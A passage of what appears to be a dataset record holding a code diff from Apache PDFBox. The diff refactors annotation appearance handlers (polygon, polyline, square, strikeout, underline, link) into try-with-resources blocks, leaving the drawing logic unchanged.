borderEdge.getUpperRightX();", - "+ pathsArray[5] = borderEdge.getUpperRightY();", - "+ pathsArray[6] = borderEdge.getLowerLeftX();", - "+ pathsArray[7] = borderEdge.getUpperRightY();", - "+ }", - "+", - "+ int of = 0;", - "+ while (of + 7 < pathsArray.length)", - "+ {", - "+ if (annotation.getBorderStyle() != null &&", - "+ annotation.getBorderStyle().getStyle().equals(PDBorderStyleDictionary.STYLE_UNDERLINE))", - " {", - "- // Convert rectangle coordinates as if it was a /QuadPoints entry", - "- pathsArray = new float[8];", - "- pathsArray[0] = borderEdge.getLowerLeftX();", - "- pathsArray[1] = borderEdge.getLowerLeftY();", - "- pathsArray[2] = borderEdge.getUpperRightX();", - "- pathsArray[3] = borderEdge.getLowerLeftY();", - "- pathsArray[4] = borderEdge.getUpperRightX();", - "- pathsArray[5] = borderEdge.getUpperRightY();", - "- pathsArray[6] = borderEdge.getLowerLeftX();", - "- pathsArray[7] = borderEdge.getUpperRightY();", - "+ contentStream.moveTo(pathsArray[of], pathsArray[of + 1]);", - "+ contentStream.lineTo(pathsArray[of + 2], pathsArray[of + 3]);", - " }", - "-", - "- int of = 0;", - "- while (of + 7 < pathsArray.length)", - "+ else", - " {", - "- if (annotation.getBorderStyle() != null &&", - "- annotation.getBorderStyle().getStyle().equals(PDBorderStyleDictionary.STYLE_UNDERLINE))", - "- {", - "- contentStream.moveTo(pathsArray[of], pathsArray[of + 1]);", - "- contentStream.lineTo(pathsArray[of + 2], pathsArray[of + 3]);", - "- }", - "- else", - "- {", - "- contentStream.moveTo(pathsArray[of], pathsArray[of + 1]);", - "- contentStream.lineTo(pathsArray[of + 2], pathsArray[of + 3]);", - "- contentStream.lineTo(pathsArray[of + 4], pathsArray[of + 5]);", - "- contentStream.lineTo(pathsArray[of + 6], pathsArray[of + 7]);", - "- contentStream.closePath();", - "- }", - "- of += 8;", - "+ contentStream.moveTo(pathsArray[of], pathsArray[of + 1]);", - "+ contentStream.lineTo(pathsArray[of + 2], pathsArray[of + 3]);", - "+ contentStream.lineTo(pathsArray[of + 4], pathsArray[of + 5]);", - "+ contentStream.lineTo(pathsArray[of + 6], pathsArray[of + 7]);", - "+ contentStream.closePath();", - " }", - "-", - "- contentStream.drawShape(lineWidth, hasStroke, false);", - "+ of += 8;", - " }", - "+", - "+ contentStream.drawShape(lineWidth, hasStroke, false);", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "index 87fe22d72..29730a10b 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "@@ -93,65 +93,62 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", - "- try", - "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", - " {", - "- try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", - "+ boolean hasStroke = contentStream.setStrokingColorOnDemand(getColor());", - "+", - "+ boolean hasBackground = contentStream", - "+ .setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "+", - "+ setOpacity(contentStream, annotation.getConstantOpacity());", - "+", - "+ contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", - "+ //TODO find better way to do this. Either pass border array to", - "+ // setBorderLine(), or use AnnotationBorder class", - "+ if (annotation.getBorderStyle() == null)", - " {", - "- boolean hasStroke = contentStream.setStrokingColorOnDemand(getColor());", - "+ COSArray border = annotation.getBorder();", - "+ if (border.size() > 3 && border.getObject(3) instanceof COSArray)", - "+ {", - "+ contentStream.setLineDashPattern(((COSArray) border.getObject(3)).toFloatArray(), 0);", - "+ }", - "+ }", - "- boolean hasBackground = contentStream", - "- .setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", - "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", - "+ {", - "+ CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", - "+ borderEffect.getIntensity(), lineWidth, getRectangle());", - "+ cloudyBorder.createCloudyPolygon(pathArray);", - "+ annotation.setRectangle(cloudyBorder.getRectangle());", - "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - "+ appearanceStream.setBBox(cloudyBorder.getBBox());", - "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", - "+ }", - "+ else", - "+ {", - "+ // the differences rectangle", - "+ setRectDifference(lineWidth);", - "- setOpacity(contentStream, annotation.getConstantOpacity());", - "+ // Acrobat applies a padding to each side of the bbox so the line is", - "+ // completely within the bbox.", - "- contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", - "- //TODO find better way to do this. Either pass border array to", - "- // setBorderLine(), or use AnnotationBorder class", - "- if (annotation.getBorderStyle() == null)", - "+ for (int i = 0; i < pathArray.length; i++)", - " {", - "- COSArray border = annotation.getBorder();", - "- if (border.size() > 3 && border.getObject(3) instanceof COSArray)", - "+ float[] pointsArray = pathArray[i];", - "+ // first array shall be of size 2 and specify the moveto operator", - "+ if (i == 0 && pointsArray.length == 2)", - " {", - "- contentStream.setLineDashPattern(((COSArray) border.getObject(3)).toFloatArray(), 0);", - "+ contentStream.moveTo(pointsArray[0], pointsArray[1]);", - " }", - "- }", - "- ", - "- PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", - "- if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", - "- {", - "- CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", - "- borderEffect.getIntensity(), lineWidth, getRectangle());", - "- cloudyBorder.createCloudyPolygon(pathArray);", - "- annotation.setRectangle(cloudyBorder.getRectangle());", - "- PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - "- appearanceStream.setBBox(cloudyBorder.getBBox());", - "- appearanceStream.setMatrix(cloudyBorder.getMatrix());", - "- }", - "- else", - "- {", - "- // the differences rectangle", - "- setRectDifference(lineWidth);", - "- ", - "- // Acrobat applies a padding to each side of the bbox so the line is", - "- // completely within the bbox.", - "- ", - "- for (int i = 0; i < pathArray.length; i++)", - "+ else", - " {", - "- float[] pointsArray = pathArray[i];", - "- // first array shall be of size 2 and specify the moveto operator", - "- if (i == 0 && pointsArray.length == 2)", - "+ // entries of length 2 shall be treated as lineto operator", - "+ if (pointsArray.length == 2)", - " {", - "- contentStream.moveTo(pointsArray[0], pointsArray[1]);", - "+ contentStream.lineTo(pointsArray[0], pointsArray[1]);", - " }", - "- else", - "+ else if (pointsArray.length == 6)", - " {", - "- // entries of length 2 shall be treated as lineto operator", - "- if (pointsArray.length == 2)", - "- {", - "- contentStream.lineTo(pointsArray[0], pointsArray[1]);", - "- }", - "- else if (pointsArray.length == 6)", - "- {", - "- contentStream.curveTo(pointsArray[0], pointsArray[1],", - "- pointsArray[2], pointsArray[3],", - "- pointsArray[4], pointsArray[5]);", - "- }", - "+ contentStream.curveTo(pointsArray[0], pointsArray[1],", - "+ pointsArray[2], pointsArray[3],", - "+ pointsArray[4], pointsArray[5]);", - " }", - "@@ -159,4 +156,4 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- contentStream.drawShape(lineWidth, hasStroke, hasBackground);", - " }", - "+ contentStream.drawShape(lineWidth, hasStroke, hasBackground);", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "index d9ae0fbe8..cba698cd4 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "@@ -95,90 +95,87 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - "- try", - "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - " {", - "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - "- {", - "- boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "- setOpacity(cs, annotation.getConstantOpacity());", - "- boolean hasStroke = cs.setStrokingColorOnDemand(color);", - "+ boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "+ setOpacity(cs, annotation.getConstantOpacity());", - "+ boolean hasStroke = cs.setStrokingColorOnDemand(color);", - "- if (ab.dashArray != null)", - "- {", - "- cs.setLineDashPattern(ab.dashArray, 0);", - "- }", - "- cs.setLineWidth(ab.width);", - "+ if (ab.dashArray != null)", - "+ {", - "+ cs.setLineDashPattern(ab.dashArray, 0);", - "+ }", - "+ cs.setLineWidth(ab.width);", - "- for (int i = 0; i < pathsArray.length / 2; ++i)", - "+ for (int i = 0; i < pathsArray.length / 2; ++i)", - "+ {", - "+ float x = pathsArray[i * 2];", - "+ float y = pathsArray[i * 2 + 1];", - "+ if (i == 0)", - " {", - "- float x = pathsArray[i * 2];", - "- float y = pathsArray[i * 2 + 1];", - "- if (i == 0)", - "+ if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", - " {", - "- if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", - "+ // modify coordinate to shorten the segment", - "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - "+ float x1 = pathsArray[2];", - "+ float y1 = pathsArray[3];", - "+ float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", - "+ if (Float.compare(len, 0) != 0)", - " {", - "- // modify coordinate to shorten the segment", - "- // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - "- float x1 = pathsArray[2];", - "- float y1 = pathsArray[3];", - "- float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", - "- if (Float.compare(len, 0) != 0)", - "- {", - "- x += (x1 - x) / len * ab.width;", - "- y += (y1 - y) / len * ab.width;", - "- }", - "+ x += (x1 - x) / len * ab.width;", - "+ y += (y1 - y) / len * ab.width;", - " }", - "- cs.moveTo(x, y);", - " }", - "- else", - "+ cs.moveTo(x, y);", - "+ }", - "+ else", - "+ {", - "+ if (i == pathsArray.length / 2 - 1 &&", - "+ SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", - " {", - "- if (i == pathsArray.length / 2 - 1 &&", - "- SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", - "+ // modify coordinate to shorten the segment", - "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - "+ float x0 = pathsArray[pathsArray.length - 4];", - "+ float y0 = pathsArray[pathsArray.length - 3];", - "+ float len = (float) (Math.sqrt(Math.pow(x0 - x, 2) + Math.pow(y0 - y, 2)));", - "+ if (Float.compare(len, 0) != 0)", - " {", - "- // modify coordinate to shorten the segment", - "- // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - "- float x0 = pathsArray[pathsArray.length - 4];", - "- float y0 = pathsArray[pathsArray.length - 3];", - "- float len = (float) (Math.sqrt(Math.pow(x0 - x, 2) + Math.pow(y0 - y, 2)));", - "- if (Float.compare(len, 0) != 0)", - "- {", - "- x -= (x - x0) / len * ab.width;", - "- y -= (y - y0) / len * ab.width;", - "- }", - "+ x -= (x - x0) / len * ab.width;", - "+ y -= (y - y0) / len * ab.width;", - " }", - "- cs.lineTo(x, y);", - " }", - "+ cs.lineTo(x, y);", - " }", - "- cs.stroke();", - "+ }", - "+ cs.stroke();", - "- // do a transform so that first and last \"arms\" are imagined flat, like in line handler", - "- // the alternative would be to apply the transform to the LE shapes directly,", - "- // which would be more work and produce code difficult to understand", - "+ // do a transform so that first and last \"arms\" are imagined flat, like in line handler", - "+ // the alternative would be to apply the transform to the LE shapes directly,", - "+ // which would be more work and produce code difficult to understand", - "- // paint the styles here and after polyline draw, to avoid line crossing a filled shape", - "- if (!LE_NONE.equals(annotation.getStartPointEndingStyle()))", - "- {", - "- // check only needed to avoid q cm Q if LE_NONE", - "- float x2 = pathsArray[2];", - "- float y2 = pathsArray[3];", - "- float x1 = pathsArray[0];", - "- float y1 = pathsArray[1];", - "- cs.saveGraphicsState();", - "- double angle = Math.atan2(y2 - y1, x2 - x1);", - "- cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "- drawStyle(annotation.getStartPointEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", - "- cs.restoreGraphicsState();", - "- }", - "+ // paint the styles here and after polyline draw, to avoid line crossing a filled shape", - "+ if (!LE_NONE.equals(annotation.getStartPointEndingStyle()))", - "+ {", - "+ // check only needed to avoid q cm Q if LE_NONE", - "+ float x2 = pathsArray[2];", - "+ float y2 = pathsArray[3];", - "+ float x1 = pathsArray[0];", - "+ float y1 = pathsArray[1];", - "+ cs.saveGraphicsState();", - "+ double angle = Math.atan2(y2 - y1, x2 - x1);", - "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "+ drawStyle(annotation.getStartPointEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", - "+ cs.restoreGraphicsState();", - "+ }", - "- if (!LE_NONE.equals(annotation.getEndPointEndingStyle()))", - "- {", - "- // check only needed to avoid q cm Q if LE_NONE", - "- float x1 = pathsArray[pathsArray.length - 4];", - "- float y1 = pathsArray[pathsArray.length - 3];", - "- float x2 = pathsArray[pathsArray.length - 2];", - "- float y2 = pathsArray[pathsArray.length - 1];", - "- // save / restore not needed because it's the last one", - "- double angle = Math.atan2(y2 - y1, x2 - x1);", - "- cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "- float lineLength = (float) Math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)));", - "- drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, 0, ab.width, hasStroke, hasBackground);", - "- }", - "+ if (!LE_NONE.equals(annotation.getEndPointEndingStyle()))", - "+ {", - "+ // check only needed to avoid q cm Q if LE_NONE", - "+ float x1 = pathsArray[pathsArray.length - 4];", - "+ float y1 = pathsArray[pathsArray.length - 3];", - "+ float x2 = pathsArray[pathsArray.length - 2];", - "+ float y2 = pathsArray[pathsArray.length - 1];", - "+ // save / restore not needed because it's the last one", - "+ double angle = Math.atan2(y2 - y1, x2 - x1);", - "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "+ float lineLength = (float) Math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)));", - "+ drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, 0, ab.width, hasStroke, hasBackground);", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "index 1577dace5..75fd04e72 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "@@ -60,26 +60,52 @@ public class PDSquareAppearanceHandler extends PDAbstractAppearanceHandler", - " float lineWidth = getLineWidth();", - "- try", - "+ PDAnnotationSquare annotation = (PDAnnotationSquare) getAnnotation();", - "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", - " {", - "- PDAnnotationSquare annotation = (PDAnnotationSquare) getAnnotation();", - "- try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", - "+ boolean hasStroke = contentStream.setStrokingColorOnDemand(getColor());", - "+ boolean hasBackground = contentStream", - "+ .setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "+", - "+ setOpacity(contentStream, annotation.getConstantOpacity());", - "+", - "+ contentStream.setBorderLine(lineWidth, annotation.getBorderStyle()); ", - "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", - "+", - "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", - "+ {", - "+ CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", - "+ borderEffect.getIntensity(), lineWidth, getRectangle());", - "+ cloudyBorder.createCloudyRectangle(annotation.getRectDifference());", - "+ annotation.setRectangle(cloudyBorder.getRectangle());", - "+ annotation.setRectDifference(cloudyBorder.getRectDifference());", - "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - "+ appearanceStream.setBBox(cloudyBorder.getBBox());", - "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", - "+ }", - "+ else", - " {", - "- boolean hasStroke = contentStream.setStrokingColorOnDemand(getColor());", - "- boolean hasBackground = contentStream", - "- .setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "- ", - "- setOpacity(contentStream, annotation.getConstantOpacity());", - "- ", - "- contentStream.setBorderLine(lineWidth, annotation.getBorderStyle()); ", - "- PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", - "- ", - "- if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", - "+ // handle the border box", - "+ //", - "+ // There are two options. The handling is not part of the PDF specification but", - "+ // implementation specific to Adobe Reader", - "+ // - if /RD is set the border box is the /Rect entry inset by the respective", - "+ // border difference.", - "+ // - if /RD is not set the border box is defined by the /Rect entry. The /RD entry will", - "+ // be set to be the line width and the /Rect is enlarged by the /RD amount", - "+", - "+ PDRectangle borderBox = null;", - "+ float[] rectDifferences = annotation.getRectDifferences();", - "+", - "+ if (rectDifferences.length == 0)", - " {", - "- CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", - "- borderEffect.getIntensity(), lineWidth, getRectangle());", - "- cloudyBorder.createCloudyRectangle(annotation.getRectDifference());", - "- annotation.setRectangle(cloudyBorder.getRectangle());", - "- annotation.setRectDifference(cloudyBorder.getRectDifference());", - "- PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - "- appearanceStream.setBBox(cloudyBorder.getBBox());", - "- appearanceStream.setMatrix(cloudyBorder.getMatrix());", - "+ borderBox = getPaddedRectangle(getRectangle(), lineWidth/2);", - "+ // the differences rectangle", - "+ annotation.setRectDifferences(lineWidth/2);", - "+ annotation.setRectangle(addRectDifferences(getRectangle(), annotation.getRectDifferences()));", - "+", - "+ // when the normal appearance stream was generated BBox and Matrix have been set to the", - "+ // values of the original /Rect. As the /Rect was changed that needs to be adjusted too.", - "+ annotation.getNormalAppearanceStream().setBBox(getRectangle());", - "+ AffineTransform transform = AffineTransform.getTranslateInstance(-getRectangle().getLowerLeftX(),", - "+ -getRectangle().getLowerLeftY());", - "+ annotation.getNormalAppearanceStream().setMatrix(transform);", - " }", - "@@ -87,40 +113,11 @@ public class PDSquareAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- // handle the border box", - "- //", - "- // There are two options. The handling is not part of the PDF specification but", - "- // implementation specific to Adobe Reader", - "- // - if /RD is set the border box is the /Rect entry inset by the respective", - "- // border difference.", - "- // - if /RD is not set the border box is defined by the /Rect entry. The /RD entry will", - "- // be set to be the line width and the /Rect is enlarged by the /RD amount", - "- ", - "- PDRectangle borderBox = null;", - "- float[] rectDifferences = annotation.getRectDifferences();", - "- ", - "- if (rectDifferences.length == 0)", - "- {", - "- borderBox = getPaddedRectangle(getRectangle(), lineWidth/2);", - "- // the differences rectangle", - "- annotation.setRectDifferences(lineWidth/2);", - "- annotation.setRectangle(addRectDifferences(getRectangle(), annotation.getRectDifferences()));", - "-", - "- // when the normal appearance stream was generated BBox and Matrix have been set to the", - "- // values of the original /Rect. As the /Rect was changed that needs to be adjusted too.", - "- annotation.getNormalAppearanceStream().setBBox(getRectangle());", - "- AffineTransform transform = AffineTransform.getTranslateInstance(-getRectangle().getLowerLeftX(),", - "- -getRectangle().getLowerLeftY());", - "- annotation.getNormalAppearanceStream().setMatrix(transform);", - "- }", - "- else", - "- {", - "- borderBox = applyRectDifferences(getRectangle(), rectDifferences);", - "- borderBox = getPaddedRectangle(borderBox, lineWidth/2);", - "- }", - "-", - "- contentStream.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", - "- borderBox.getWidth(), borderBox.getHeight());", - "+ borderBox = applyRectDifferences(getRectangle(), rectDifferences);", - "+ borderBox = getPaddedRectangle(borderBox, lineWidth/2);", - " }", - "- contentStream.drawShape(lineWidth, hasStroke, hasBackground);", - "+ contentStream.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", - "+ borderBox.getWidth(), borderBox.getHeight());", - " }", - "+", - "+ contentStream.drawShape(lineWidth, hasStroke, hasBackground);", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "index f8a5b325f..052f98b61 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "@@ -91,49 +91,46 @@ public class PDStrikeoutAppearanceHandler extends PDAbstractAppearanceHandler", - "- try", - "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - " {", - "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - "+ setOpacity(cs, annotation.getConstantOpacity());", - "+", - "+ cs.setStrokingColor(color);", - "+ if (ab.dashArray != null)", - " {", - "- setOpacity(cs, annotation.getConstantOpacity());", - "+ cs.setLineDashPattern(ab.dashArray, 0);", - "+ }", - "+ cs.setLineWidth(ab.width);", - "- cs.setStrokingColor(color);", - "- if (ab.dashArray != null)", - "+ // spec is incorrect", - "+ // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", - "+ for (int i = 0; i < pathsArray.length / 8; ++i)", - "+ {", - "+ // get mid point between bounds, substract the line width to approximate what Adobe is doing", - "+ // See e.g. CTAN-example-Annotations.pdf and PLPDF.com-MarkupAnnotations.pdf", - "+ // and https://bugs.ghostscript.com/show_bug.cgi?id=693664", - "+ // do the math for diagonal annotations with this weird old trick:", - "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - "+ float len0 = (float) (Math.sqrt(Math.pow(pathsArray[i * 8] - pathsArray[i * 8 + 4], 2) + ", - "+ Math.pow(pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5], 2)));", - "+ float x0 = pathsArray[i * 8 + 4];", - "+ float y0 = pathsArray[i * 8 + 5];", - "+ if (Float.compare(len0, 0) != 0)", - " {", - "- cs.setLineDashPattern(ab.dashArray, 0);", - "+ // only if both coordinates are not identical to avoid divide by zero", - "+ x0 += (pathsArray[i * 8] - pathsArray[i * 8 + 4]) / len0 * (len0 / 2 - ab.width);", - "+ y0 += (pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5]) / len0 * (len0 / 2 - ab.width);", - " }", - "- cs.setLineWidth(ab.width);", - "-", - "- // spec is incorrect", - "- // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", - "- for (int i = 0; i < pathsArray.length / 8; ++i)", - "+ float len1 = (float) (Math.sqrt(Math.pow(pathsArray[i * 8 + 2] - pathsArray[i * 8 + 6], 2) + ", - "+ Math.pow(pathsArray[i * 8 + 3] - pathsArray[i * 8 + 7], 2)));", - "+ float x1 = pathsArray[i * 8 + 6];", - "+ float y1 = pathsArray[i * 8 + 7];", - "+ if (Float.compare(len1, 0) != 0)", - " {", - "- // get mid point between bounds, substract the line width to approximate what Adobe is doing", - "- // See e.g. CTAN-example-Annotations.pdf and PLPDF.com-MarkupAnnotations.pdf", - "- // and https://bugs.ghostscript.com/show_bug.cgi?id=693664", - "- // do the math for diagonal annotations with this weird old trick:", - "- // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - "- float len0 = (float) (Math.sqrt(Math.pow(pathsArray[i * 8] - pathsArray[i * 8 + 4], 2) + ", - "- Math.pow(pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5], 2)));", - "- float x0 = pathsArray[i * 8 + 4];", - "- float y0 = pathsArray[i * 8 + 5];", - "- if (Float.compare(len0, 0) != 0)", - "- {", - "- // only if both coordinates are not identical to avoid divide by zero", - "- x0 += (pathsArray[i * 8] - pathsArray[i * 8 + 4]) / len0 * (len0 / 2 - ab.width);", - "- y0 += (pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5]) / len0 * (len0 / 2 - ab.width);", - "- }", - "- float len1 = (float) (Math.sqrt(Math.pow(pathsArray[i * 8 + 2] - pathsArray[i * 8 + 6], 2) + ", - "- Math.pow(pathsArray[i * 8 + 3] - pathsArray[i * 8 + 7], 2)));", - "- float x1 = pathsArray[i * 8 + 6];", - "- float y1 = pathsArray[i * 8 + 7];", - "- if (Float.compare(len1, 0) != 0)", - "- {", - "- // only if both coordinates are not identical to avoid divide by zero", - "- x1 += (pathsArray[i * 8 + 2] - pathsArray[i * 8 + 6]) / len1 * (len1 / 2 - ab.width);", - "- y1 += (pathsArray[i * 8 + 3] - pathsArray[i * 8 + 7]) / len1 * (len1 / 2 - ab.width);", - "- }", - "- cs.moveTo(x0, y0);", - "- cs.lineTo(x1, y1);", - "+ // only if both coordinates are not identical to avoid divide by zero", - "+ x1 += (pathsArray[i * 8 + 2] - pathsArray[i * 8 + 6]) / len1 * (len1 / 2 - ab.width);", - "+ y1 += (pathsArray[i * 8 + 3] - pathsArray[i * 8 + 7]) / len1 * (len1 / 2 - ab.width);", - " }", - "- cs.stroke();", - "+ cs.moveTo(x0, y0);", - "+ cs.lineTo(x1, y1);", - " }", - "+ cs.stroke();", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", - "index 93535c514..48363df3b 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", - "@@ -92,25 +92,22 @@ public class PDUnderlineAppearanceHandler extends PDAbstractAppearanceHandler", - "- try", - "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - " {", - "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - "- {", - "- setOpacity(cs, annotation.getConstantOpacity());", - "+ setOpacity(cs, annotation.getConstantOpacity());", - "- cs.setStrokingColor(color);", - "- if (ab.dashArray != null)", - "- {", - "- cs.setLineDashPattern(ab.dashArray, 0);", - "- }", - "- cs.setLineWidth(ab.width);", - "+ cs.setStrokingColor(color);", - "+ if (ab.dashArray != null)", - "+ {", - "+ cs.setLineDashPattern(ab.dashArray, 0);", - "+ }", - "+ cs.setLineWidth(ab.width);", - "- // spec is incorrect", - "- // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", - "- for (int i = 0; i < pathsArray.length / 8; ++i)", - "- {", - "- // only lower coords are used", - "- cs.moveTo(pathsArray[i * 8 + 4], pathsArray[i * 8 + 5]);", - "- cs.lineTo(pathsArray[i * 8 + 6], pathsArray[i * 8 + 7]);", - "- }", - "- cs.stroke();", - "+ // spec is incorrect", - "+ // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", - "+ for (int i = 0; i < pathsArray.length / 8; ++i)", - "+ {", - "+ // only lower coords are used", - "+ cs.moveTo(pathsArray[i * 8 + 4], pathsArray[i * 8 + 5]);", - "+ cs.lineTo(pathsArray[i * 8 + 6], pathsArray[i * 8 + 7]);", - " }", - "+ cs.stroke();", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - 